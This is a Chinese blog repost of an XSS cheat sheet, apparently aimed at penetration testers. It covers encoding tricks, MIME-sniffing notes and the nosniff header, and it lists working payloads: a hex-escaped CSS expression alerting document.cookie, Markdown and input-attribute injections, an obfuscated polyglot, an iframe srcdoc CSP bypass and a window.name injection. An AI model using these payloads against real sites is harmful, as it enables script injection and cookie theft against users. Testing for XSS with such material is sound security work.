XSS 备忘录

最新推荐文章于 2023-04-08 22:20:03 发布
最新推荐文章于 2023-04-08 22:20:03 发布
阅读量215 收藏
点赞数
文章标签: javascript markdown php ViewUI
原文链接:http://www.cnblogs.com/skrr/p/10984675.html
版权

0x00 Encoding
URL Encode、HTML Entity、JS (Octal、Hexa、Unicode)

0x01 Content-Type: text/plain; 浏览器不解析JS XSS, Extensions and Content-Types
vul: IE 构造 eml 跨域加载 text/plain XSS 0day-textplain-considered-harmful
注意: text/plain 参数中可可注入

0x02 在响应中,Content-Type标头告诉客户端实际返回的内容的内容类型。在缺失 MIME 类型或客户端认为文件设置了错误的 MIME 类型时,浏览器可能会通过查看资源来进行MIME嗅探。每一个浏览器在不同的情况下会执行不同的操作。为了防止这种行为,可以将标题 X-Content-Type-Options 设置为 nosniff

0x03 css expression 的XSS css里,允许使用转义字符,  + ascii16进制形式

expr\65ssion\28%20eval\28\27\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\64\6f\63\75\6d\65\6e\74\2e\63\6f\6f\6b\69\65\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\7d\27\29\29

0x04 输出在HTMl属性例子如下:<HTML标签 onXXXX="...[输出在这里].."> <a href="javascript:[输出在这里]">xxxx </a>

0x05 存储xss

注册页面的url参数中 xss payload 会存储在Cookie中。

0x06 Markdown XSS
https://hackerone.com/reports/299728
payload:</http://<?php\><\h1\><script:script>confirm(2)

0x07 input 标签 XSS

  " autofocus onfocus=window.location="\152\141\166\141\163\143\162\151\160\164\072\141\154\145\162\164\050\061\051" a="    
" onfocus="alert(1)" autofocus="

0x08 <a href 标签 XSS

“:” with : or %26colon;

<a href='#user=user=' onmouseover=alert()//'>Welcome</a>!!

0x09 polygot

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

0x10 bypass csp

<iframe srcdoc="<script src='http://127.0.0.1/1.js'></script>"></iframe>

0x11 window.name

var victim= window.open('http://example.com/vulnerable', '<script>alert("boom");<\/script>');

转载于:https://www.cnblogs.com/skrr/p/10984675.html

weixin_30493321
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss备忘录.pdf
03-14
小编希望大家能够更加的了解网络安全,让熟悉安全的人更规范,让不懂安全的人了解安全,增进大家的网络安全意识
XSS备忘录
Ms08067安全实验室
01-20 937
HTML5特性向量<formid="test"></form><buttonform="test"formaction...
XSS测试备忘录
weixin_44540892的博客
03-07 211
点击跳转 XSS测试备忘录
XSS备忘录(转)
weixin_47306547的博客
09-17 1336
目录 原文地址:http://drops.wooyun.org/tips/1955 介绍 测试 xss 探测器 xss 探测器2 无过滤绕过 通过javascript指令实现的图片xss 无引号无分号 不区分大小写的xss攻击向量 html 实体 重音符混淆 畸形的A标签 畸形的IMG标签 fromCharCode 默认SRC属性去绕过SRC域名检测过滤器 默认SRC属性通过省略它的值 默认SRC属性通过完全不设置它 通过error事件触发alert 十进制html编码
给开发者的终极XSS防护备忘录
07-16
给开发者的终极XSS防护备忘录
给开发者的终极XSS防护备忘录.pdf
09-07
XSS 或者说跨站脚本是一种 Web 应用程序的漏洞,当来自用户的不可信数据被应用程序 在没有验证以及反射回浏览器而没有进行编码或转义的情况下进行了处理,导致浏览器引 擎执行了代码。 XSS 类型 • 反射型 XSS • 存储...
密码备忘录代码实现
11-30
7. **安全实践**:开发者在实现密码备忘录时,必须遵循严格的安全编码原则,避免常见的安全漏洞,如SQL注入、XSS攻击等。 8. **测试与审计**:代码测试是验证程序正确性的关键步骤,包括单元测试、集成测试和安全...
Java 内存结构备忘录1
08-04
Java 内存结构备忘录 Java 内存结构是一个复杂的系统,包括堆内存模型、垃圾回收算法和处理内存泄露的最佳方案。Java 虚拟机(JVM)中存在 PermGen(内存永久保存区域), PermGen 中存储了常量池、字段与方法数据...
Xss Bypass备忘录
weixin_30698297的博客
01-06 1893
技术要发展,免不了风波. 也许这些攻攻防防会更好的促进技术的发展也说不定 就让这一次次的爆破换来将来更精练的技术的无比的宁静吧 我们静观其变吧! 缅怀当初那份最纯真Hacker精神!! 2017.深圳 By:Legend 译文源起 翻译本文最初源自国内在对2014年老道翻译的一个版本,发现此版本有些翻译个人认为不太满意,在加上2017年国庆长假漫漫,无人陪伴(主要还是约妹子...
IE6,7,8对content-type 为 text/plain 的内容处理方式
pp12345mm的专栏
07-31 1826
举例: header("Content-Type:text/plain"); ?> document.getElementById("main").src="javascript:alert(1)"; ie下会弹框。 chrome,firefox直接显示文本内容。 document.getElementById("main")
Content-Type为text/plain的请求方式
NJR10byh的博客
03-24 5268
使用axios axios({ url: "url", method: "post", data: data, headers: { "Content-Type": "text/plain", }, }).then((res) => { console.log(res);
Tomcat服务器配置X-Content-Type-Options、X-XSS-Protection、Content-Security-Policy、X-Frame-Options
热门推荐
时光有伱,记忆成花~
03-08 3万+
Tomcat目录下,配置请求头 打开tomcat/conf/web.xml,增加如下配置(交流群:700637673) <filter> <filter-name>httpHeaderSecurity</filter-name> <filter-class>org.apache.catal...
漏洞篇(XSS 跨站脚本攻击一)
最新发布
m0_58001548的博客
04-08 2209
1、Cookie 概述:Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":(1)、当用户访问 web 页面时,他的名字可以记录在 cookie 中。2)、在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。Cookie 以键值对形式存储,如下所示:
XSS漏洞分析
lvley的博客
09-18 487
XSS漏洞是什么?网页(客户端)发送请求时隐藏可自动执行的脚本,从而使脚本跨站执行(cross site scripeting),达到攻击目的。由于缩写和CSS冲突,故使用XSSXSS攻击示例服务器接口:http://ip:port/test?name=aaa&hobby=bbb服务器大致处理过程:String param1 = request.getParameter("name"); Stri
text/html和text/plain的区别
空白_回忆的博客
01-07 3万+
1、text/html的意思是将文件的content-type设置为text/html的形式,浏览器在获取到这种文件时会自动调用html的解析器对文件进行相应的处理。2、text/plain的意思是将文件设置为纯文本的形式,浏览器在获取到这种文件时并不会对其进行处理。
text/plain 与 text/xml有什么区别
Somethings
10-24 6738
application/xml 、 text/xml、text/html、text/plain的区别 1、text/html是html格式的正文  2、text/plain是无格式正文 3、text/xml忽略xml头所指定编码格式而默认采用us-ascii编码 4、application/xml会根据xml头指定的编码格式来编码: text/pl
Java防止Xss注入json_前端进阶,你必须要了解的安全问题之XSS攻击
weixin_39621379的博客
11-20 545
前端安全一直是一个老生常谈的话题,但是在实际的工作过程中,我发现大部分的前端同学对此了解不多,或者说知道一些但从没有在意识层面真正重视过。今天我们就来扒一扒前端到底有哪些安全问题,我们到底该以什么样的态度怎么去看待它。在深入分析之前我们还是按照惯例先大概介绍下什么是XSS攻击。XSS-跨站脚本攻击跨站脚本(Cross-site scripting,通常简称为XSS)是一种网站应用程序的安全漏洞攻击...
关于防止xss攻击使用xss.js出现的一些报错
枣泥馅的博客
07-11 4351
我们在看使用前台过滤script脚本的时候使用到了xss.js,在它的官方文档中写了这样的一段使用说明: 在浏览器端使用 Shim模式(参考文件test/test.html): <script src="https://raw.github.com/leizongmin/js-xss/master/dist/xss.js"></script> <script...
2019年XSS攻击备忘单:绕过策略与技术细节
"本文档是关于跨站脚本(XSS)的备忘单,由Portswigger公司的Web安全学院在2019年更新,旨在为渗透测试人员提供XSS攻击的各种方法,包括事件处理、协议利用、特殊属性、字符限制、编码技巧以及沙箱逃逸策略。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值